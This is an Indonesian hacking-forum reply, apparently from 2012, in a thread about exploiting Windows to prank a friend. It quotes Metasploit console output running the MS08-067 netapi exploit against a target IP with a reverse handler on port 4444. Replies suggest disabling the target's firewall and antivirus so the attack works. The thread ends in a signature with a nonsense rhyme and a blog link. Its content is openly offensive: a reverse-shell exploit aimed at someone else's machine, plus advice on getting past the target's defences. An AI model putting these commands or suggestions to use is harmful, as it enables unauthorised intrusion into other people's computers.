Exploit Windows ga pake Backdoor + ngerjain temen
#16
(02-07-2012, 11:53 AM)konspirasi Wrote:
Quote:kok punya ku jawabannya gini ya?
msf exploit(ms08_067_netapi) > set RHOST 10.10.19.10
RHOST => 10.10.19.10
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.19.75:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
mohon bantuannya yah

coba matiin firewall n antivirus target pasti bisa Big Grin

cara mematikan firewall dan antivirus di target bagaimana pak?
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix


Messages In This Thread
RE: Exploit Windows ga pake Backdoor + ngerjain temen - by wine trochanter - 02-07-2012, 11:57 AM




Users browsing this thread: 1 Guest(s)